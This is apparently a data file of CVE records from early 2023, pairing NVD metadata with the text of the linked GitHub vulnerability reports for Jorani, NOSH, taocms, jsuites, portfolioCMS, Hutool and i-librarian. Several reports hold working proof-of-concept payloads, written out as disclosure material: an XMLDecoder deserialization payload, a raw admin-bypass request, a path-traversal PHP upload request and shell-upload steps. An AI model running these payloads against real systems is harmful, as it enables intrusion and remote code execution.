[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jorani:jorani:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "CE8B2D2D-7CCC-4688-9C1C-5C2512F140E6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/bbalet/jorani/issues/379
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "bbalet", "jorani" ]
Github issue tracker is used for bug only. For general questions and requests, please join the [Google group](https://groups.google.com/forum/#!forum/jorani) Don't hesitate to provide screenshots. ### What is the version of Jorani? v1.0 ### Expected behavior Acronym is just a normal form parameter, but if I modify the length of that column in database, I can input a longer XSS payload ![image](https://user-images.githubusercontent.com/78632303/209642883-637c691f-7f6c-4bfb-a3cd-e32b56ea2b24.png) ![image](https://user-images.githubusercontent.com/78632303/209642534-6a958e28-550a-41b0-9ac6-06ed206a80cb.png) ### Actual behavior And when next time I look at the page, a XSS vulnerability is pop out. ![image](https://user-images.githubusercontent.com/78632303/209643122-6d50d44e-2c1f-49d8-8ce4-e0846c492dae.png) ### Steps to reproduce the behavior Details can be seen in the following docx. [jorani.docx](https://github.com/bbalet/jorani/files/10307198/jorani.docx)
There may be XSS hidden dangers here
https://api.github.com/repos/bbalet/jorani/issues/379/comments
2
2022-12-27T09:18:26Z
2023-05-17T08:43:14Z
https://github.com/bbalet/jorani/issues/379
1,511,606,696
379
4,665
CVE-2023-24065
2023-01-29T22:15:09.047
NOSH 4a5cfdb allows stored XSS via the create user page. For example, a first name (of a physician, assistant, or billing user) can have a JavaScript payload that is executed upon visiting the /users/2/1 page. This may allow attackers to steal Protected Health Information because the product is for health charting.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/abbisQQ/e0967d5b8355087c8e224bdd1ace3bf3" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/shihjay2/docker-nosh" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/shihjay2/nosh2/issues/202" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/shihjay2/nosh2/tree/4a5cfdbd73f6a2ab5ee43a33d173c46fe0271533" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://noshemr.wordpress.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/abbisQQ/e0967d5b8355087c8e224bdd1ace3bf3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/shihjay2/docker-nosh" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/shihjay2/nosh2/issues/202" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/shihjay2/nosh2/tree/4a5cfdbd73f6a2ab5ee43a33d173c46fe0271533" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://noshemr.wordpress.com" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nosh_chartingsystem_project:nosh_chartingsystem:-:*:*:*:*:*:*:*", "matchCriteriaId": "180704D4-8A66-4502-9485-38392FE11B2D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/shihjay2/nosh2/issues/202
[ "Exploit", "Third Party Advisory" ]
github.com
[ "shihjay2", "nosh2" ]
A stored Cross Site Scripting found in create user functionality. To exploit it we must create a user a pass the payload below as the first name ![xss1](https://user-images.githubusercontent.com/21143253/213881003-555c44ba-d120-456d-b363-e92413d17fe1.png) Then we save the user and navigate back to the main users panel. As we can see the xss payload is getting executed. ![xss2](https://user-images.githubusercontent.com/21143253/213881013-303e83d3-f777-434f-ae16-51f2bfaff98a.png) You can prevent the above vulnerabilty by filtering user input and encode it when it gets reflected to a page. https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html https://portswigger.net/web-security/cross-site-scripting#stored-cross-site-scripting I made a public gist for the issue above: https://gist.github.com/abbisQQ/e0967d5b8355087c8e224bdd1ace3bf3
Stored Cross Site Scripting(XSS)
https://api.github.com/repos/shihjay2/nosh2/issues/202/comments
0
2023-01-21T18:08:59Z
2023-01-28T22:05:01Z
https://github.com/shihjay2/nosh2/issues/202
1,551,872,337
202
4,666
CVE-2022-48006
2023-01-30T22:15:12.463
An arbitrary file upload vulnerability in taocms v3.0.2 allows attackers to execute arbitrary code via a crafted PHP file. This vulnerability is exploited via manipulation of the upext variable at /include/Model/Upload.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/35" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/35" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/taogogo/taocms/issues/35
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
This is the latest 3.0.2 version of taocms. Organize and utilize steps in two steps: Step1: Audit the source code "include/Model/Upload.php", line 33, the filename extension can be controlled by modifying variable "upext": <img width="1339" alt="image" src="https://user-images.githubusercontent.com/39691787/208852959-9a6c23b4-01be-4592-8f3d-0948b85de5ea.png"> Follow up in "include/Model/File.php", line 75, there is a $this->realpath and find that it comes from $this->path, and $this->path can be passed in through the get parameter (where SYS_ROOT is the root directory of the website): <img width="1439" alt="image" src="https://user-images.githubusercontent.com/39691787/208853182-59b46a3e-2a38-4084-bb08-996363cb3d42.png"> Here any changes to the variable "upext" or file "Upload.php" can be saved by the method "save" which locates at "include/Model/File.php", line 73: <img width="1439" alt="image" src="https://user-images.githubusercontent.com/39691787/208853836-2d4396cf-ec94-4fdb-921b-0523cc24faf9.png"> At this stage, you can add "php" filename extension to the variable "upext" and click "save" to save it: <img width="1274" alt="image" src="https://user-images.githubusercontent.com/39691787/208854105-e8f57225-8b51-4599-86a2-ff0338a77b3a.png"> Step 2: Next, you can upload any php file to the system: <img width="756" alt="image" src="https://user-images.githubusercontent.com/39691787/208854359-84d18435-e9f9-4799-9051-80e761392163.png"> New a.php file is successfully uploaded: <img width="994" alt="image" src="https://user-images.githubusercontent.com/39691787/208854618-62a32110-842e-429e-9468-8ddb28393f2e.png"> Once you uploaded file, you can open the file through the path "http://www.taocms.com:9090/a.php", and you can get shell of this system: <img width="1065" alt="image" src="https://user-images.githubusercontent.com/39691787/208854924-60da59e5-3222-483b-8586-553e669f6b47.png">
File upload vulnerability exists by modifying Upload.php configuration in backend.
https://api.github.com/repos/taogogo/taocms/issues/35/comments
0
2022-12-21T08:22:48Z
2022-12-21T08:22:48Z
https://github.com/taogogo/taocms/issues/35
1,505,893,165
35
4,667
CVE-2022-25979
2023-01-31T05:15:11.927
Versions of the package jsuites before 5.0.1 are vulnerable to Cross-site Scripting (XSS) due to improper user-input sanitization in the Editor() function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.5, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jsuites/jsuites/commit/b31770d5fe91684a00177f629aab933139c32d9f" }, { "source": "report@snyk.io", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jsuites/jsuites/issues/134" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3253331" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-JSUITES-3226764" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jsuites/jsuites/commit/b31770d5fe91684a00177f629aab933139c32d9f" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jsuites/jsuites/issues/134" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3253331" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-JSUITES-3226764" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsuites:jsuites:*:*:*:*:*:*:*:*", "matchCriteriaId": "DCEC8F07-41E2-4780-A249-C8D37CFED690", "versionEndExcluding": "5.0.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jsuites/jsuites/issues/134
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jsuites", "jsuites" ]
Hi team, I have tried contacting You via Mail [contact@jsuites.net](mailto:contact@jsuites.net) but it does not work and bounce back. Im bit new to this Issue Raise via Giithub. Can i share the Issue Details here (Or) Do you have any other medium to raise issue. If yes kindly add me into it will share further Details there to avoid exposing it in public
Copy Paste XSS in JSuite
https://api.github.com/repos/jsuites/jsuites/issues/134/comments
1
2023-01-04T09:22:53Z
2024-09-08T10:29:30Z
https://github.com/jsuites/jsuites/issues/134
1,518,620,138
134
4,668
CVE-2020-20402
2023-01-31T16:15:08.730
Westbrookadmin portfolioCMS v1.05 allows attackers to bypass password validation and access sensitive information via session fixation.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Westbrookadmin/portfolioCMS/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Westbrookadmin/portfolioCMS/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:portfoliocms_project:portfoliocms:1.0.5:*:*:*:*:*:*:*", "matchCriteriaId": "F348E990-DA35-40BE-9B85-23F0A25ED2F5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "287" ]
287
https://github.com/Westbrookadmin/portfolioCMS/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Westbrookadmin", "portfolioCMS" ]
allows an attacker to use GETS method to request /admin page to bypass the password validation and access management page. GET /portfolioCMS-master/admin/setup.php HTTP/1.1 Host: 172.16.100.15 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: keep-alive Refere:http://172.16.100.15/portfolioCMS-master/admin/ Cookie: admin-menu=%7B%220%22%3A1%2C%221%22%3A1%2C%222%22%3A1%7D; admin_username=admin; PHPSESSID=u25c0656jai48kjhvo27kl2loq Upgrade-Insecure-Requests: 1 ![MRPLQ9(G54TS%_C%Z2T5VUI](https://user-images.githubusercontent.com/43309768/67823235-3e46ad80-fafd-11e9-8052-046fca345a59.png)
allows an attacker to use GETS method to request /admin page to bypass the password validation and access management page.
https://api.github.com/repos/Westbrookadmin/portfolioCMS/issues/2/comments
0
2019-10-30T02:32:06Z
2019-10-30T02:32:06Z
https://github.com/Westbrookadmin/portfolioCMS/issues/2
514,354,766
2
4,669
CVE-2023-24162
2023-01-31T16:15:09.220
Deserialization vulnerability in Dromara Hutool v5.8.11 allows attacker to execute arbitrary code via the XmlUtil.readObjectFromXml parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gitee.com/dromara/hutool/issues/I6AEX2" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/dromara/hutool/issues/2855" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gitee.com/dromara/hutool/issues/I6AEX2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/dromara/hutool/issues/2855" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hutool:hutool:5.8.11:*:*:*:*:*:*:*", "matchCriteriaId": "A354824B-591F-4F37-8681-734B7CDE00AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/dromara/hutool/issues/2855
[ "Exploit", "Third Party Advisory" ]
github.com
[ "dromara", "hutool" ]
### Desc Hutool provides XML utility classes that may be vulnerable to remote code execution when using XmlUtil.readObjectFromXml to interpret untrusted XML strings ### Detailed The program will call XMLDecoder.readObject to parse the XML string, causing a deserialization vulnerability *cn.hutool.core.util.XmlUtil#readObjectFromXml* ![image](https://user-images.githubusercontent.com/50647385/212257301-e7534834-f1bd-4088-a475-447ec2c4a697.png) ### Attack ```java XmlUtil.readObjectFromXml("<java>\n" + " <object class=\"java.lang.ProcessBuilder\">\n" + " <array class=\"java.lang.String\" length=\"1\">\n" + " <void index=\"0\">\n" + " <string>calc</string>\n" + " </void>\n" + " </array>\n" + " <void method=\"start\"></void>\n" + " </object>\n" + "</java>\n"); ``` ![image](https://user-images.githubusercontent.com/50647385/212257507-8a499ded-8268-42cf-aa24-a0b92e901840.png)
XmlUtil Deserialization vulnerability
https://api.github.com/repos/chinabugotech/hutool/issues/2855/comments
1
2023-01-13T07:01:40Z
2023-01-15T03:03:37Z
https://github.com/chinabugotech/hutool/issues/2855
1,531,809,515
2,855
4,670
CVE-2023-24163
2023-01-31T16:15:09.270
SQL Inection vulnerability in Dromara hutool before 5.8.21 allows attacker to execute arbitrary code via the aviator template engine.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gitee.com/dromara/hutool/issues/I6AJWJ#note_15801868" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://gitee.com/dromara/hutool/issues/I6AJWJ#note_20057806_link" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/dromara/hutool/issues/3149" }, { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://github.com/dromara/hutool/releases/tag/5.8.21" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/google/osv.dev/issues/2195" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gitee.com/dromara/hutool/issues/I6AJWJ#note_15801868" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://gitee.com/dromara/hutool/issues/I6AJWJ#note_20057806_link" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/dromara/hutool/issues/3149" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes" ], "url": "https://github.com/dromara/hutool/releases/tag/5.8.21" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/google/osv.dev/issues/2195" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hutool:hutool:*:*:*:*:*:*:*:*", "matchCriteriaId": "786FE505-3B01-48DF-8F35-27B22D0E0312", "versionEndExcluding": "5.8.21", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/dromara/hutool/issues/3149
[ "Issue Tracking" ]
github.com
[ "dromara", "hutool" ]
参考 https://github.com/murphysecurity/murphysec-jetbrains-plugin/issues/15
CVE-2023-24163 不处理下吗?
https://api.github.com/repos/chinabugotech/hutool/issues/3149/comments
5
2023-06-14T02:42:23Z
2023-08-11T03:39:23Z
https://github.com/chinabugotech/hutool/issues/3149
1,755,936,135
3,149
4,671
CVE-2023-24163
2023-01-31T16:15:09.270
SQL Inection vulnerability in Dromara hutool before 5.8.21 allows attacker to execute arbitrary code via the aviator template engine.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gitee.com/dromara/hutool/issues/I6AJWJ#note_15801868" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://gitee.com/dromara/hutool/issues/I6AJWJ#note_20057806_link" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/dromara/hutool/issues/3149" }, { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://github.com/dromara/hutool/releases/tag/5.8.21" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/google/osv.dev/issues/2195" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gitee.com/dromara/hutool/issues/I6AJWJ#note_15801868" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://gitee.com/dromara/hutool/issues/I6AJWJ#note_20057806_link" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/dromara/hutool/issues/3149" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes" ], "url": "https://github.com/dromara/hutool/releases/tag/5.8.21" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/google/osv.dev/issues/2195" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hutool:hutool:*:*:*:*:*:*:*:*", "matchCriteriaId": "786FE505-3B01-48DF-8F35-27B22D0E0312", "versionEndExcluding": "5.8.21", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/google/osv.dev/issues/2195
[ "Issue Tracking" ]
github.com
[ "google", "osv.dev" ]
**The CVE ID** This issue is related with CVE-2023-24163 and [GHSA-6c25-cxcc-pmc4](https://osv.dev/vulnerability/GHSA-6c25-cxcc-pmc4) **Describe the data quality issue observed** Recently, we found that last affected version of CVE-2023-24163 is incorrect. According to its release note and issue pages, hutool fixed CVE-2023-24163 in verision 5.8.21. However, last affected version listed in OSV is 5.8.11. This incorrect information may mislead developers using this software. **Suggested changes to record** Update the fix version to 5.8.21. **Additional context** References: gitee issue page: https://gitee.com/dromara/hutool/issues/I6AJWJ#note_20057806_link github issue page: https://github.com/dromara/hutool/issues/3149 hutool release note: https://github.com/dromara/hutool/releases
Data quality issue CVE-2023-24163
https://api.github.com/repos/google/osv.dev/issues/2195/comments
3
2024-05-09T06:19:33Z
2024-05-23T00:43:42Z
https://github.com/google/osv.dev/issues/2195
2,286,980,349
2,195
4,672
CVE-2022-47854
2023-01-31T18:15:09.880
i-librarian 4.10 is vulnerable to Arbitrary file upload in ajaxsupplement.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mkucej/i-librarian/issues/155" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mkucej/i-librarian/issues/155#issue-1501906608" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mkucej/i-librarian/issues/155" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mkucej/i-librarian/issues/155#issue-1501906608" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:i-librarian:i-librarian:4.10:*:*:*:*:*:*:*", "matchCriteriaId": "E91C680F-5011-49A3-9C1D-70C19BA22D89", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/mkucej/i-librarian/issues/155
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "mkucej", "i-librarian" ]
# Summary The $_POST['filename'] is not filtered so that the php suffix file can be uploaded across directories. # Detail Using the replace PDF function, an attacker can upload a file with php as the suffix and %PDF as the beginning of file content to any directory by controlling the filename parameter. ``` if (in_array($file_extension, array('doc', 'docx', 'vsd', 'xls', 'xlsx', 'ppt', 'pptx', 'odt', 'ods', 'odp'))) ... ... else move_uploaded_file($_FILES['form_new_file']['tmp_name'], IL_TEMP_PATH . DIRECTORY_SEPARATOR . 'lib_' . session_id() . DIRECTORY_SEPARATOR . $_POST['filename']); ``` # POC like this ``` POST /ajaxsupplement.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------36332819052109193833351732483 Content-Length: 981 Origin: http://127.0.0.1 DNT: 1 Connection: close Referer: http://127.0.0.1/index2.php Cookie: PHPSESSID=i7l1jt5cp8bbgt41p888aii2r7 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------36332819052109193833351732483 Content-Disposition: form-data; name="file" 1 -----------------------------36332819052109193833351732483 Content-Disposition: form-data; name="filename" ../../z.php -----------------------------36332819052109193833351732483 Content-Disposition: form-data; name="form_new_file"; filename="1.php" Content-Type: application/pdf %PDF <?php phpinfo();?> -----------------------------36332819052109193833351732483 Content-Disposition: form-data; name="form_new_file_link" -----------------------------36332819052109193833351732483 Content-Disposition: form-data; name="form_graphical_abstract" -----------------------------36332819052109193833351732483 Content-Disposition: form-data; name="form_supplementary_file[]" -----------------------------36332819052109193833351732483 Content-Disposition: form-data; name="proxystr" -----------------------------36332819052109193833351732483--
Arbitrary file upload in ajaxsupplement.php
https://api.github.com/repos/mkucej/i-librarian/issues/155/comments
0
2022-12-18T13:41:09Z
2022-12-18T13:41:09Z
https://github.com/mkucej/i-librarian/issues/155
1,501,906,608
155
4,673
CVE-2022-47854
2023-01-31T18:15:09.880
i-librarian 4.10 is vulnerable to Arbitrary file upload in ajaxsupplement.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
